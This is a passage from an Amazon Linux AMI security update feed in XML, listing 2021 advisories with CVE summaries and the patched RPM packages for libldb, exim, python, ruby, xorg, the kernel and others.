arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.108-1.40.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1494</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1494: important priority package update for libldb</title><issued date="2021-04-19 17:26:00" /><updated date="2021-04-21 17:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-20277:
A flaw was found in Samba's libldb. Multiple, consecutive leading spaces in an LDAP attribute can lead to an out-of-bounds memory write, leading to a crash of the LDAP server process handling the request. The highest threat from this vulnerability is to system availability.
1941402: CVE-2021-20277 samba: Out of bounds read in AD DC LDAP server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20277" title="" id="CVE-2021-20277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="pyldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-devel-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="pyldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="libldb-debuginfo" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-debuginfo-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="libldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-devel-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="ldb-tools" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ldb-tools-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="libldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="libldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-devel-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="pyldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/pyldb-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="libldb-debuginfo" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-debuginfo-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="pyldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/pyldb-devel-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="ldb-tools" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/ldb-tools-1.5.4-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1495</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1495: medium priority package update for nvidia</title><issued date="2021-04-19 17:41:00" /><updated date="2021-04-21 17:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-1076:
Security fix for nvidia.
CVE-2021-1076: nvidia
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1076" title="" id="CVE-2021-1076" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nvidia" version="418.197.02" release="2018.03.117.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-418.197.02-2018.03.117.amzn1.x86_64.rpm</filename></package><package name="nvidia-dkms" version="418.197.02" release="2018.03.117.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-dkms-418.197.02-2018.03.117.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1496</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1496: medium priority package update for busybox</title><issued date="2021-05-06 19:11:00" /><updated date="2021-05-07 19:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28831:
decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.
1941028: CVE-2021-28831 busybox: invalid free or segmentation fault via malformed gzip data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831" title="" id="CVE-2021-28831" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox" version="1.19.3" release="2.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.19.3-2.12.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.19.3-2.12.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.19.3" release="2.12.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.19.3-2.12.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.12.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.19.3-2.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1497</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1497: important priority package update for exim</title><issued date="2021-05-06 19:11:00" /><updated date="2021-05-07 20:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-28021:
99999: Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command.
CVE-2020-28018:
99999: Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.
CVE-2020-28017:
99999: Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption.
CVE-2020-28015:
99999: Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28015" title="" id="CVE-2020-28015" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28017" title="" id="CVE-2020-28017" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28018" title="" id="CVE-2020-28018" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28021" title="" id="CVE-2020-28021" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1498</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1498: medium priority package update for python35</title><issued date="2021-05-06 19:11:00" /><updated date="2021-05-07 19:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3426:
No description is available for this CVE.
1935913: CVE-2021-3426 python: information disclosure via pydoc
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
1928904: CVE-2021-23336 python: Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a semicolon in query parameters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426" title="" id="CVE-2021-3426" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-libs" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.10-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1499</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1499: important priority package update for runc</title><issued date="2021-05-14 16:52:00" /><updated date="2021-05-19 17:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-30465:
RESERVED
CVE-2021-30465 runc: reserved
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30465" title="" id="CVE-2021-30465" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.0.0" release="0.3.20210225.git12644e6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.0.0-0.3.20210225.git12644e6.4.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.0.0" release="0.3.20210225.git12644e6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.0.0-0.3.20210225.git12644e6.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1500</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1500: medium priority package update for python36</title><issued date="2021-05-14 16:53:00" /><updated date="2021-05-19 17:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3426:
No description is available for this CVE.
1935913: CVE-2021-3426 python: information disclosure via pydoc
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
1928904: CVE-2021-23336 python: Web cache poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a semicolon in query parameters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426" title="" id="CVE-2021-3426" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-debuginfo" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1501</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1501: medium priority package update for ruby24</title><issued date="2021-05-14 16:58:00" /><updated date="2021-05-19 17:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28965:
The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing.
1947526: CVE-2021-28965 ruby: XML round-trip vulnerability in REXML
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28965" title="" id="CVE-2021-28965" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems24-devel" version="2.6.14.4" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.14.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.14.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.14.4" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.14.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" version="2.4.10" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.14.amzn1.noarch.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.14.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.14.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.14.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.14.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.14.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1502</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1502: important priority package update for xorg-x11-server</title><issued date="2021-05-14 17:00:00" /><updated date="2021-05-19 17:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3472:
A flaw was found in xorg-x11-server. An interger underflow can occur in xserver which can lead to a local privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1944167: CVE-2021-3472 xorg-x11-server: XChangeFeedbackControl integer underflow leads to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3472" title="" id="CVE-2021-3472" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.44.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.44.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1503</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1503: low priority package update for kernel</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33033:
The Linux kernel before 5.11.14 has a use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c because the CIPSO and CALIPSO refcounting for the DOI definitions is mishandled, aka CID-ad5d07f4a9cd. This leads to writing an arbitrary value.
CVE-2021-31916:
An out-of-bounds (OOB) memory write flaw was found in list_devices in drivers/md/dm-ioctl.c in the Multi-device driver module in the Linux kernel. A bound check failure allows an attacker with special user (CAP_SYS_ADMIN) privilege to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability.
1946965: CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c
CVE-2021-31829:
A flaw was found in the Linux kernel's eBPF verification code. By default, accessing the eBPF verifier is only accessible to privileged users with CAP_SYS_ADMIN. This flaw allows a local user who can insert eBPF instructions, to use the eBPF verifier to abuse a spectre-like flaw and infer all system memory. The highest threat from this vulnerability is to confidentiality.
1957788: CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory
CVE-2021-29155:
A vulnerability was discovered in retrieve_ptr_limit in kernel/bpf/verifier.c in the Linux kernel mechanism to mitigate speculatively out-of-bounds loads (Spectre mitigation). In this flaw a local,
special user privileged (CAP_SYS_ADMIN) BPF program running on affected systems may bypass the protection, and execute speculatively out-of-bounds loads from the kernel memory. This can be abused to extract contents of kernel memory via side-channel.
1951595: CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory
CVE-2021-29154:
A flaw was found in the Linux kernels eBPF implementation. By default, accessing the eBPF verifier is only accessible to privileged users with CAP_SYS_ADMIN. A local user with the ability to insert eBPF instructions can abuse a flaw in eBPF to corrupt memory. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
